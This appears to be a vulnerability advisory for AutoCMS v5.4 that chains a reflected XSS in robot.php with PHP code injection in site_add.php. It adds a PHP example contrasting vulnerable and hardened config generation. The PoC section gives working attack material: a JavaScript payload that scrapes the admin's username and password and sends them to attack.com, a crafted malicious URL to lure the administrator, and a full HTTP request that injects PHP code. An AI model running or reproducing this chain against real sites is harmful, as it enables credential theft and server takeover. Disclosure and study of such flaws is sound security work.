Summary
AutoCMS v5.4 is affected by a Cross-Site Scripting (XSS) vulnerability and a PHP Code Injection vulnerability. The XSS vulnerability can be exploited to capture administrator credentials, which can then be used to exploit the PHP Code Injection vulnerability.
Details
Cross-Site Scripting (XSS) Vulnerability
Affected Component: /admin/robot.php
Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.
PHP Code Injection
Affected Component: /admin/site_add.php
Description: The application mishandles the txtsite_url parameter, allowing attackers to inject PHP code. By crafting a specific value for txtsite_url, an attacker can execute arbitrary PHP code on the server.
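Both findings above come down to untrusted input reaching a code or markup sink unencoded: robot.php reflects page and sidebar into HTML, and site_add.php writes the submitted settings into a PHP file under config/<txtsiteurl>/ that is later included. The following is an added example, not AutoCMS code, showing the vulnerable pattern the advisory implies (raw concatenation into PHP source; assumed, since the advisory does not show the application's code) next to a hardened version. The function names, the intParam()/siteDirName() helpers and the config layout are assumptions; the PoC request carries the injected code in txttarget_url while the description names txtsite_url, so both URL fields are treated identically here.

```php
<?php
// Added example (not AutoCMS code): output encoding for reflected parameters and
// safe generation of a PHP config file from user-supplied settings.
declare(strict_types=1);

// --- XSS side: robot.php reflects `page` and `sidebar` into HTML ---

// Encode a value for insertion into HTML text or a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Restrict `page` and `sidebar` to what they actually are: small integers.
// Anything else (such as `1"><sCRiPt ...`) falls back to the default.
function intParam(array $query, string $name, int $default = 1): int
{
    $v = filter_var($query[$name] ?? $default, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 9999]]);
    return $v === false ? $default : $v;
}

function renderSidebarLink(array $query): string
{
    $page    = intParam($query, 'page');
    $sidebar = intParam($query, 'sidebar');
    // Even after validation, encode at the sink (defence in depth).
    return '<a href="robot.php?page=' . h((string)$page)
         . '&amp;sidebar=' . h((string)$sidebar) . '">sidebar ' . h((string)$sidebar) . '</a>';
}

// --- Code-injection side: site_add.php writes settings into config/<site>/config.php ---

// Vulnerable pattern (assumed; reproduces the behaviour the advisory describes):
// the raw value is concatenated into PHP source, so a value containing `";`
// terminates the string literal and the rest runs when config.php is included.
function buildConfigUnsafe(array $post): string
{
    return "<?php\n"
         . "\$site_url = \"" . $post['txtsite_url'] . "\";\n"
         . "\$target_url = \"" . $post['txttarget_url'] . "\";\n";
}

// Hardened: validate each field against its expected shape, then serialize with
// var_export(), which emits a correctly quoted PHP literal whatever the input holds.
function buildConfigSafe(array $post): string
{
    $siteUrl   = filter_var($post['txtsite_url'] ?? '', FILTER_VALIDATE_URL);
    $targetUrl = filter_var($post['txttarget_url'] ?? '', FILTER_VALIDATE_URL);
    if ($siteUrl === false || $targetUrl === false) {
        throw new InvalidArgumentException('site and target must be absolute URLs');
    }
    $settings = ['site_url' => $siteUrl, 'target_url' => $targetUrl];
    // A data-only file, consumed with `$cfg = include $path;` (no variables to clobber).
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// The directory name comes from txtsiteurl; keep it to a safe token so it cannot
// carry path separators or `..` out of the config/ tree.
function siteDirName(string $name): string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        throw new InvalidArgumentException('invalid site name');
    }
    return $name;
}

// Demonstration with constructed input shaped like the advisory's payload
// (%0d in the request decodes to a carriage return).
$post = [
    'txtsiteurl'    => 'hebing123',
    'txtsite_url'   => 'http://www.aaa.com',
    'txttarget_url' => "1\";\rphpinfo();\r\$test=\"1",
];
echo "--- unsafe config (contains a live phpinfo(); statement) ---\n";
echo buildConfigUnsafe($post), "\n";

echo "--- hardened: validation rejects the payload ---\n";
try {
    echo buildConfigSafe($post), "\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

echo "--- hardened: var_export keeps even a hostile string as data ---\n";
// Shown separately so the serialization step is visible on its own:
echo var_export($post['txttarget_url'], true), "\n";

echo "--- escaped reflection for the XSS URL ---\n";
echo renderSidebarLink(['page' => '1', 'sidebar' => '1"><sCRiPt/SrC=//attack.com/1.js>']), "\n";
echo 'config dir: ', siteDirName($post['txtsiteurl']), "\n";
```

Run it with `php example.php`. The unsafe builder prints a file in which phpinfo(); stands on its own line as executable code; the hardened builder refuses the value at validation, and even if validation were loosened, var_export() would emit it as a single-quoted literal that include never executes. The reflected link is rendered with the hostile sidebar value replaced by the default and encoded at the sink.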
POC
1. Host a JavaScript file on the attacker's server.
JavaScript Payload Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http(s)://target-ip/admin/index.php?sidebar=10', true);
xhr.onload = function() {
    if (xhr.status >= 200 && xhr.status < 300) {
        var parser = new DOMParser();
        var doc = parser.parseFromString(xhr.responseText, 'text/html');
        var username = doc.querySelector('input[name="txtusername"]').value;
        var password = doc.querySelector('input[name="txtpassword"]').value;
        var newUrl = 'http(s)://attack.com/log.php?username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password);
        var xhr2 = new XMLHttpRequest();
        xhr2.open('GET', newUrl, true);
        xhr2.onload = function() {
            if (xhr2.status >= 200 && xhr2.status < 300) {
                console.log('Okk!');
            } else {
                console.error('NO! Status:', xhr2.status);
            }
        };
        xhr2.onerror = function() {
            console.error('Network!');
        };
        xhr2.send();
    } else {
        console.error('NO!', xhr.status);
    }
};
xhr.send();
2. Send a malicious URL to the target administrator: http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E
After the administrator clicks on the link, we obtain the username and password, which allow us to log into the backend and exploit the code injection vulnerability to control the server.
3. After sending the POC request below, we only need to access http(s)://target-ip/config/hebing123/config.php to see that the phpinfo function has been executed successfully.
POC:
POST /admin/site_add.php?save=ok HTTP/1.1
Host: target-ip
Content-Length: 951
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: [admin-cookie]
Accept-Language: zh-CN,zh;q=0.9
Connection: close
txtsiteurl=hebing123&txtsite_url=http%3A%2F%2Fwww.aaa.com&txttarget_url=1";%0dphpinfo();%0d$test="1&txtTDK=1&txtreplace_mode=0&txtTDKasc=0&txtindex_title=%E8%BF%99%E6%98%AF%E9%A6%96%E9%A1%B5%E6%A0%87%E9%A2%98&txtindex_keywords=&txtindex_description=&txtcapture_mode=0&txtanti_theft=1&txtuser_curl=1&txtuser_agent=baidu&txtother_agent=Mozilla%2F5.0+%28Windows+NT+6.2%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F32.0.1667.0+Safari%2F537.36&txtuser_client=auto&txtnochange=.zip%7C.rar%7C.avi%7C.jpg%7C.gif%7C.png&txtjump_mode=0&txtjump=http%3A%2F%2Fwww.so.com&txtjump_title=%E6%A1%86%E6%9E%B6%E8%B0%83%E7%94%A8%E6%A0%87%E9%A2%98&txtchange_link=0&txtlink_name=link.php&txturl_encode=1&txtnochange_url=127.0.0.1%7Cautocms.cn&txtcache_time=0&txtcache_index=0&txtcache_img=1&txtshield_spider=1&txtspider_tj=1&txtspider_name=semrushbot%2Cmj12bot%2Cteoma%2Ctwiceler%2Cscrubby%2Crobozilla%2Cgigabot%2Cahrefsbot%2Cpetalbot%2Cdotbot